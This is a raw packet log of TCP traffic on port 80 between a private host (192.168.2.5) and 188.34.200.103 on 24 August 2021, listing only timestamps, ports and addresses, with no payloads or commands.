Aug 24, 2021 08:49:22.488163948 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.488194942 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.488219976 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.488249063 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.488287926 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.488333941 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.488359928 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.488409042 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.488434076 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.488503933 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.488513947 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.488518953 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.488523006 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.488529921 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.488534927 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.488538980 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.488543034 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.488548040 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.496985912 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.499640942 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.848834038 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.869493961 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.869708061 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.869729996 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.869756937 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.869775057 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.869801998 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.869822025 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.869837999 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.869844913 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.869853020 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.869868040 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.869872093 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.869891882 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.869906902 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.869910955 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.869925022 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.869947910 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.869957924 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.869962931 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.869977951 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.869987011 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.869993925 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870012045 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870027065 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.870038986 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870058060 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870076895 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870093107 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.870095015 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870109081 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870131016 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870131016 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.870142937 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870163918 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870178938 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870196104 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870208979 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870229959 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870242119 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870245934 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.870259047 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870276928 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870294094 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870306015 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870322943 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870340109 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870345116 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.870357990 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870369911 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870383024 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.870389938 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.870394945 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870408058 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870426893 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.870429039 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870446920 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870471001 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870471954 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.870488882 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870508909 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.870511055 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870523930 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870542049 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.870544910 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870557070 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870573997 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.870579004 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870596886 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870620012 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870634079 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870651960 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.870656013 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.870659113 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870667934 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870671034 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.870687008 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870698929 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870714903 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.870722055 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870737076 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870754004 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.870757103 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870769978 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870784998 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.870790005 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870805025 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870811939 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.870821953 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870834112 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870839119 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.870852947 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870867014 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870882988 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.870887041 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870898962 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870913982 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.870918989 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870929956 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870946884 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.870949984 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870965958 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870975971 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.870984077 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.870995045 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.871004105 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.871017933 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.871033907 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.871056080 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.871063948 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.871073961 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.871083021 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.871090889 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.871105909 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.871129990 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.871181011 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.871195078 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.871198893 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.871218920 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.871236086 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.871253014 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.871269941 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.871279955 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.871284008 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.871301889 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.871320009 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.871320009 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.871330976 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.871335983 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.871354103 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.871371984 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.871380091 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.871392012 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.871400118 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.871417046 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.871426105 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.871428967 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.871447086 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.871464968 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.871465921 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.871476889 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.871489048 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.871510029 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.871517897 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.871951103 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.876503944 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.876532078 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.876574993 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.876681089 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.876708031 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.063957930 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.085254908 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.085283041 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.085313082 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.085330963 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.085350990 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.085378885 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.085397959 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.085417032 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.085436106 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.085460901 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.085479975 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.085504055 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.085524082 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.085542917 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.085562944 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.085582018 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.085604906 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.085623026 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.085638046 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.085649967 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.085661888 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.085664988 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.085668087 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.085670948 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.085671902 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.085674047 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.085675955 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.085679054 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.085690975 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.085714102 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.085715055 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.085735083 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.085742950 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.085755110 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.085776091 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.085777044 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.085797071 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.085812092 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.085820913 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.085840940 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.085860014 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.085861921 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.085880995 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.085905075 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.085915089 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.085923910 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.085937977 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.085942984 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.085959911 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.085985899 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.086005926 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.086009026 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.086028099 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.086041927 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.086052895 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.086072922 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.086085081 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.086092949 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.086112976 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.086113930 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.086131096 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.086150885 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.086152077 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.086172104 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.086194038 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.086196899 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.086218119 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.086241007 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.086241961 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.086261034 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.086275101 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.086278915 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.086296082 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.086299896 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.086319923 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.086330891 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.086344004 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.086364985 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.086376905 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.086383104 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.086395025 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.086402893 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.086424112 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.086431026 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.086442947 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.086463928 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.086467981 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.086484909 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.086508036 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.086508989 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.086529016 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.086548090 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.086568117 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.086568117 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.086596012 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.086615086 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.086616039 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.086637020 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.086656094 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.086678982 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.086698055 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.086721897 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.086740971 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.086764097 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.086771011 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.086777925 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.086782932 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.086803913 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.086823940 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.086843014 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.086867094 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.086885929 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.086910009 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.086929083 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.086954117 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.086972952 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.086998940 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.087018013 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.087039948 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.087059021 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.087078094 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.087104082 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.087146997 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.087167025 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.087188005 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.087208986 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.087219954 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.087229013 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.087238073 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.087241888 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.087244987 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.087246895 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.087249994 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.087249994 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.087254047 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.087258101 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.087260962 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.087264061 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.087265968 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.087269068 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.087270021 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.087271929 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.087275028 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.087291002 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.087313890 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.087321997 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.087333918 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.087357044 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.087374926 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.087378979 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.087394953 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.087395906 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.087405920 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.087416887 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.087435961 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.087459087 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.087460041 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.087481976 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.087501049 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.087512970 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.087516069 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.087536097 CEST	80	49718	188.34.200.103	192.168.2.5
